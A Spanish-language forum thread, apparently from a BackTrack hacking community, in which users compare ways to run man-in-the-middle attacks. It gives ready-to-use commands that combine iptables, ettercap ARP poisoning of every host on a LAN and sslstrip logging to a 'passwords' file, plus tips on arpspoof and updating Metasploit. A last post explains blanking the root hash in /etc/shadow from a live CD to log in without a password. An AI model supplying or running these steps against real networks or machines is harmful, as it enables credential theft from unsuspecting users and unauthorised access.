No mi bro... yo no uso otro sniffer.... has pruebas si quieres.... sólo iptables + arspoof + sslstrip

Saludos! 

ok... ya entiendo el uso del ettercap en este post... pero bueno aun así no veo la necesidad de usar el ettercap.

Yo uso solamente el SSLStrip con el ArpSpoof y me funciona de maravilla. Las https caen enseguida 

mmmm..... pues mira que usando solo el arpspoof haces el MitM 

o usando solo el ettercap haces tambien el MitM por eso digo que no veo la necesidad de mezclarlos...

o hay algo mas detrás??? explícame que esa es mi duda...

Para actualizarlo, tan solo tendremos que ir a la carpeta de Metasploit (/pentest/exploits/
framework3/) y ejecutar la orden “svn update”.

fuente: Revista Linux+.

bueno ya no es necesario ponernos como root porque en el BT ya estamos como root

El segundo problema que veo con el sslstrip. alguien me puede explicar porque usan ettercap con arpspoof????

porque yo no le veo el caso!!!!!!!!!!!!!!!!!!!!!!!!!!!

mejor prueba esto

pero si lo quieres hacer con ettercap puedes probar esto:

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
ettercap -TqM arp // // -i eth0
sslstrip -w passwords
tail -f passwords

con esos pasos ahorras hacer 1 al ip_forward y ya no usas arpspoof además envenenas a todos en la LAN xD

algo tarde pero pues a lo mejor a alguien le sirve... :p

Puedes usar un live cd de cualquier distro, simplemente montas la particion donde está instalado el sistema que no recuerdas la password y como ya te dijeron el archivo a editar es /etc/shadow ahi busca una linea que diga root: por lo regular es la primera y dejala de esta forma:

root::14788:0:99999:7:::

es decir, eliminar la contraseña cifrada.... y cuando te loggeas usa root y como pass nada